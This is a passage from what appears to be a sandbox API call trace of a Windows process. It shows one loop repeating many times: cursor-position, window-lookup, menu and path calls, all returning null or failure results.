lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.649] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.649] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.649] GetMenu (hWnd=0x0) returned 0x0 [0027.649] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x11e) returned -1 [0027.649] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.649] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.649] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.649] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.649] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.649] GetStockObject (i=6) returned 0x1b00018 [0027.649] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.649] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.649] PathFileExistsW (pszPath=0x0) returned 0 [0027.649] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.649] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.649] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.649] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.649] GetMenu (hWnd=0x0) returned 0x0 [0027.649] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.650] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.650] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.650] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.650] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.650] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.650] GetStockObject (i=6) returned 0x1b00018 [0027.650] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.650] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.650] PathFileExistsW (pszPath=0x0) returned 0 [0027.650] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.650] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.650] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.650] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.650] GetMenu (hWnd=0x0) returned 0x0 [0027.650] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.650] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.650] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.650] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.650] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.650] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.650] GetStockObject (i=6) returned 0x1b00018 [0027.650] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.650] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.650] PathFileExistsW (pszPath=0x0) returned 0 [0027.650] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.650] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.650] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.650] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.650] GetMenu (hWnd=0x0) returned 0x0 [0027.650] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.650] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.650] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.650] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.650] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.651] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.651] GetStockObject (i=6) returned 0x1b00018 [0027.651] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.651] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.651] PathFileExistsW (pszPath=0x0) returned 0 [0027.651] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.651] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.651] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.651] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.651] GetMenu (hWnd=0x0) returned 0x0 [0027.651] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.651] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.651] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.651] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.651] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.651] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.651] GetStockObject (i=6) returned 0x1b00018 [0027.651] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.651] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.651] PathFileExistsW (pszPath=0x0) returned 0 [0027.651] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.651] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.651] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.651] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.651] GetMenu (hWnd=0x0) returned 0x0 [0027.651] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x30) returned -1 [0027.651] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.651] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.651] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.651] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.651] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.651] GetStockObject (i=6) returned 0x1b00018 [0027.651] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.651] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.652] PathFileExistsW (pszPath=0x0) returned 0 [0027.652] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.652] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.652] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.652] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.652] GetMenu (hWnd=0x0) returned 0x0 [0027.652] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.652] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.652] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.652] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.652] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.652] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.652] GetStockObject (i=6) returned 0x1b00018 [0027.652] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.652] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.652] PathFileExistsW (pszPath=0x0) returned 0 [0027.652] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.652] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.652] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.652] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.652] GetMenu (hWnd=0x0) returned 0x0 [0027.652] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.652] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.652] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.653] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.653] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.653] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.653] GetStockObject (i=6) returned 0x1b00018 [0027.653] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.653] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.653] PathFileExistsW (pszPath=0x0) returned 0 [0027.653] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.653] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.653] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.653] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.653] GetMenu (hWnd=0x0) returned 0x0 [0027.653] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.653] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.653] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.653] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.653] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.653] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.653] GetStockObject (i=6) returned 0x1b00018 [0027.653] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.653] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.653] PathFileExistsW (pszPath=0x0) returned 0 [0027.653] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.653] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.653] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.653] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.653] GetMenu (hWnd=0x0) returned 0x0 [0027.653] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.653] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.653] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.653] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.653] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.653] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.654] GetStockObject (i=6) returned 0x1b00018 [0027.654] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.654] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.654] PathFileExistsW (pszPath=0x0) returned 0 [0027.654] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.654] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.654] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.654] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.654] GetMenu (hWnd=0x0) returned 0x0 [0027.654] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2a9) returned -1 [0027.654] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.654] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.654] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.654] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.654] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.654] GetStockObject (i=6) returned 0x1b00018 [0027.654] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.654] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.654] PathFileExistsW (pszPath=0x0) returned 0 [0027.654] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.654] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.654] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.654] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.654] GetMenu (hWnd=0x0) returned 0x0 [0027.654] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.654] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.654] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.654] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.654] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.654] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.654] GetStockObject (i=6) returned 0x1b00018 [0027.654] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.654] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.654] PathFileExistsW (pszPath=0x0) returned 0 [0027.655] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.655] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.655] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.655] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.655] GetMenu (hWnd=0x0) returned 0x0 [0027.655] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.655] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.655] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.655] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.655] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.655] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.655] GetStockObject (i=6) returned 0x1b00018 [0027.655] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.655] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.655] PathFileExistsW (pszPath=0x0) returned 0 [0027.655] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.655] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.655] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.655] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.655] GetMenu (hWnd=0x0) returned 0x0 [0027.655] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.655] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.655] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.655] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.655] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.655] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.655] GetStockObject (i=6) returned 0x1b00018 [0027.655] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.655] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.655] PathFileExistsW (pszPath=0x0) returned 0 [0027.655] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.655] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.655] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.655] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.656] GetMenu (hWnd=0x0) returned 0x0 [0027.656] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.656] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.656] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.656] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.656] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.656] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.656] GetStockObject (i=6) returned 0x1b00018 [0027.656] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.656] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.656] PathFileExistsW (pszPath=0x0) returned 0 [0027.656] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.656] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.656] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.656] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.656] GetMenu (hWnd=0x0) returned 0x0 [0027.656] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x22d) returned -1 [0027.656] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.656] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.656] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.656] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.656] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.656] GetStockObject (i=6) returned 0x1b00018 [0027.656] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.656] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.656] PathFileExistsW (pszPath=0x0) returned 0 [0027.656] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.656] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.656] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.656] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.656] GetMenu (hWnd=0x0) returned 0x0 [0027.656] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.656] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.657] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.657] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.657] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.657] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.657] GetStockObject (i=6) returned 0x1b00018 [0027.657] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.657] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.657] PathFileExistsW (pszPath=0x0) returned 0 [0027.657] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.657] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.657] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.657] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.657] GetMenu (hWnd=0x0) returned 0x0 [0027.657] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.657] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.657] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.657] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.657] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.657] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.657] GetStockObject (i=6) returned 0x1b00018 [0027.657] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.657] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.657] PathFileExistsW (pszPath=0x0) returned 0 [0027.657] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.657] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.657] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.657] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.657] GetMenu (hWnd=0x0) returned 0x0 [0027.657] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.657] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.657] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.657] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.657] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.658] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.658] GetStockObject (i=6) returned 0x1b00018 [0027.658] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.658] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.658] PathFileExistsW (pszPath=0x0) returned 0 [0027.658] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.658] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.658] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.658] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.658] GetMenu (hWnd=0x0) returned 0x0 [0027.658] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.658] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.658] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.658] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.658] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.658] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.658] GetStockObject (i=6) returned 0x1b00018 [0027.658] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.658] PathAppendA (in: pszPath=0x0, pMore=0x0 